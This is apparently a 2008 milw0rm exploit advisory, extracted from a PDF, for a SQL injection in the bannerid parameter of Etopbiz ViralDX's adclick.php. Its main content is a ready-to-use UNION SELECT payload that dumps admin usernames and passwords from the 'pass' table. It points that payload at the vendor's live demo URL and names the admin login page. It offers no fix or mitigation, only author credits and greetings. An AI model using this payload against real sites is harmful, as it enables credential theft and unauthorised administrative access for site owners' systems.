Etopbiz ViralDX 2.07 adclick.php bannerid SQL Injection Vulnerability.pdf

1 ######################################################### 2 # 3 # Viral DX 1 SQL Injection Vulnerability 4 #======================================================== 5 # 6 # Author: Hussin X 7 # 8 # Home : www.tryag.cc/cc 9 # 10 # email: darkangel_g85[at]Yahoo[DoT]com 11 # hussin.x[at]hotmail[DoT]com 12 # 13 #======================================================== 14 # HomE script : http://e−topbiz.com/ 15 # 16 # Demo : http://e−topbiz.com/trafficdemos/viraldx1/ 17 # 18 # 19 ########################################################## 20 21 Exploit: 22 23 http://www.site.com/Script/adclick.php?bannerid=−1+union+select+concat_ws 24 25 (0x3a,login,pass)+from+pass−− 26 27 28 29 L!VE DEMO: 30 31 http://e−topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=− 32 33 1+union+select+concat_ws(0x3a,login,pass)+from+pass−− 34 35 36 LoGiN : 37 38 /admin/login.php 39 40 41 ################################################################################ 42 ####################################( Greetz )################################## 43 # # 44 # tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # 45 # Silic0n / Rafi / FAHD / Iraqihack # 46 # # 47 #################################(and All IRAQIs)############################### 48 49 # milw0rm.com [2008−06−24] Page 1/1 Etopbiz ViralDX 2.07 adclick.php bannerid SQL Injection Vulnerability Hussin X 06/24/2008